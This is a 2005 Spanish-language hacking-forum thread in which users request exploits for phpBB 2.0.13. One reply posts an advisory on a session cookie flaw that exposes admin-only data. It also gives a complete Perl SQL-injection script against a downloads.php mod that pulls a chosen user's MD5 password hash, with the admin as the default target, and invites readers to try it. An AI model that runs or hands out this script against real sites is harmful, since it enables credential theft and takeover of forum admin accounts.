elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 12:10  


Tema destacado: Suscripción al boletín mensual de elhacker.net

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Exploits para phpbb 2.0.13
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Exploits para phpbb 2.0.13  (Leído 2,360 veces)
GrAnDbOt

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Exploits para phpbb 2.0.13
« en: 25 Marzo 2005, 23:16 »

Alguien tiene Exploits para phpbb 2.0.13???

En línea
NelxoN

Desconectado Desconectado

Mensajes: 291


Java Programmer;


Ver Perfil
Re: Exploits para phpbb 2.0.13
« Respuesta #1 en: 9 Abril 2005, 02:21 »

Cuando será que aprenderán a utilizar el boton   :-\

-----

Exploit phpbb 2.0.XXX y como utilizarlo
http://foro.elhacker.net/index.php/topic,59840.0.html
En línea
alb3rt0

Desconectado Desconectado

Mensajes: 217


Ver Perfil
Re: Exploits para phpbb 2.0.13
« Respuesta #2 en: 9 Abril 2005, 02:27 »

ahi no hay nada de exploits para phpbb 2.0.13 xD
En línea
+ enrique ZP


Desconectado Desconectado

Mensajes: 2.937


X-Aqui


Ver Perfil WWW
Re: Exploits para phpbb 2.0.13
« Respuesta #3 en: 9 Abril 2005, 02:31 »

Cuando será que aprenderán a utilizar el boton :-\

-----

Exploit phpbb 2.0.XXX y como utilizarlo
http://foro.elhacker.net/index.php/topic,59840.0.html

    grave agujero de seguridad en los foros phpbb 2.0.12 y anteriores.

   Aun no hay noticias de bugs de esta version, puedes pasarte por las webs de

www.k-otic.com
www.securityfocus.com
www.elhacker.net  ;D

   En cuanto haya bug doy la noticia :)

   Hasta Pronto
En línea

Crack_X
Anti-War
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.320


Peace & Love


Ver Perfil WWW
Re: Exploits para phpbb 2.0.13
« Respuesta #4 en: 9 Abril 2005, 03:01 »

Hay 2 exploits para 2 modificaciones o add-ons del phpbb 2.0.13 , pero van a tener que buscarlo.
En línea

Shit loads of money spend to show us wrong from right. Say no to war


Yasser Has Things To Say
WarZone
+ enrique ZP


Desconectado Desconectado

Mensajes: 2.937


X-Aqui


Ver Perfil WWW
Re: Exploits para phpbb 2.0.13
« Respuesta #5 en: 23 Abril 2005, 06:15 »

Aqui estan los 3xploits del phpBB2.0.13

# phpBB 2.0.13 user level exploit
# By : Morinex
# e-mail : m0r1n3x@gmail.com
# date : 20-03-2005
# greetz : Ali7 (for helping me =P) , Zeltha ,  ASC and w00pie.NL
 
Exploit not founded by me!
Dunno who is the founder of this bug.
The original not works so i have fixed the some shit.

*Spechial thx 2 the founder of this bug*


This one goes for all phpBB versions up to 2.0.13. While applying and
testing the
patch for the autologin bug I found that phpBB2 doesn't reset the
$userdata['user_level']
variable after a failed autologin.

This is the vulvernable code in sessions.php:

Código:
f ( $user_id != ANONYMOUS )
{
$auto_login_key = $userdata['user_password'];

if ( $auto_create )
{
if ( isset($sessiondata['autologinid']) && $userdata['user_active'] )
{
// We have to login automagically
if( $sessiondata['autologinid'] === $auto_login_key )
{
// autologinid matches password
$login = 1;
$enable_autologin = 1;
}
else
{
// No match; don't login, set as anonymous user
$login = 0;
$enable_autologin = 0;
$user_id = $userdata['user_id'] = ANONYMOUS;
}
}
else
{
// Autologin is not set. Don't login, set as anonymous user
$login = 0;
$enable_autologin = 0;
$user_id = $userdata['user_id'] = ANONYMOUS;
}
}
else
{
$login = 1;
}
}
else
{
$login = 0;
$enable_autologin = 0;
}


As you can see, if autologin fails it will reset the
$userdata['user_id'] value to
ANONYMOUS, but $userdata['user_level'] stays at the value of the user
account that
failed to login.

Now phpBB only checks for the userlevel in various locations and
ignores the user_id
there. So if you manipulate the "_data" cookie to send the user_id of an admin
you can see some information that should only be visible to an admin.
Like hidden
users on the "who is online page" or email adresses from users, even if the
user disallowed that, in their profiles. Maybe you can even use some
admin functions,
I didn't check this in depth.

The cookie manipulation will only work on the first page requestet, as
the session.php
will then overwrite the user_id in it, unless you prevent the browser from
modifying the cookie of course.

The fix is quite simple, add $userdata['user_level'] = USER; after
every $userdata['user_id']
= ANONYMOUS; in session.php.

*Reported 2 PHPBB ^^



Y esta este, creo que hay un par mas...

Código:
#!/usr/bin/perl -w
use IO::Socket;

##    Example:
##    C:\>phpbb.pl www.site.com /phpBB2/ 2
##
##     downloads.php mod in phpBB <= 2.0.13
##     **********************************
##      [~] Connecting...
# ##      Connected!
##      [~] Sending Data...
##      [~] Data Sent, Waiting for response...
##     
# MD5 Hash for user with id=2 is: 81dc9bdb52d04dc20036dbd8313ed055
##
if (@ARGV < 3)
{
print "\n\n";
print "|****************************************************************|\n";
print " phpBB <=2.0.13 'downloads.php' Mod\n";
print " Bug found by Axl And CereBrums\n";
print " Coded by CereBrums // 2/4/2005\n";
print " Usage: phpbb.pl <site> <folder> <user_id>\n";
print " e.g.: phpbb.pl www.site.com /phpBB2/ 2 \n";
print " [~] <server> - site address\n";
print " [~] <folder> - forum folder\n";
print " [~] <user_id> - user id (2 default for phpBB admin)\n";
print "|****************************************************************|\n";
print "\n\n";
exit(1);
}

$take = 0;
$success = 0;
$server = $ARGV[0];
$folder = $ARGV[1];
$user_id = $ARGV[2];
print "\n downloads.php mod in phpBB <= 2.0.13\n";
print " **********************************\n";
print "  [~] Connecting...\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "$socket error $!";

print "
# Connected\n";
print "  [~] Sending Data...\n";

$path = "http://$server/";
$path .= "/$folder/";
$path .= "downloads.php?cat=-1%20UNION%20SELECT%200,user_password,0,0,0,0,0,0,0%20FROM%20phpbb_users%20WHERE%20user_id=$user_id/*";
print $socket "GET $path HTTP/1.0\r\n\r\n";

print "  [~] Data Sent, Waiting for response...\n";

while ($answer = <$socket>)
{
       if ($take == 1) {
               $pass = substr($answer,51,32);
               print "
# MD5 Hash for user with id=$user_id is: $pass\n";
               $success = 1;
               $take = 0;
       }
       $found = rindex ($answer,"downloads.php?view=detail&id=0&cat=0");
       if ( $found > -1 ) {
               $take = 1;
       }
}
if ($success==0) {print "  [-] Exploit failed\n";}

## EOF ##

# milw0rm.com [2005-04-02]


Cualquier duda despues de haber probado... Si tienen problemas pregunten.... ;)

Hasta Pronto...
« Última modificación: 23 Abril 2005, 09:07 por -[N]obalogi[C]- » En línea

Crack_X
Anti-War
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.320


Peace & Love


Ver Perfil WWW
Re: Exploits para phpbb 2.0.13
« Respuesta #6 en: 23 Abril 2005, 13:59 »

El 2do que pones (el exploit en perl) es para una modificacion o addon del phpbb para descargas , haci que no todas las paginas con phpbb lo van a tener.

Tambien hay 1 o 2 mas exploits para mods del phpbb.
En línea

Shit loads of money spend to show us wrong from right. Say no to war


Yasser Has Things To Say
WarZone
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
¿exploits para Vista o 7?
Hacking Básico
elmiohack 6 2,373 Último mensaje 5 Enero 2011, 17:33
por Garfield07
MOVIDO: ¿exploits para Vista o 7?
Bugs y Exploits
berz3k 0 516 Último mensaje 4 Enero 2011, 11:21
por berz3k
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines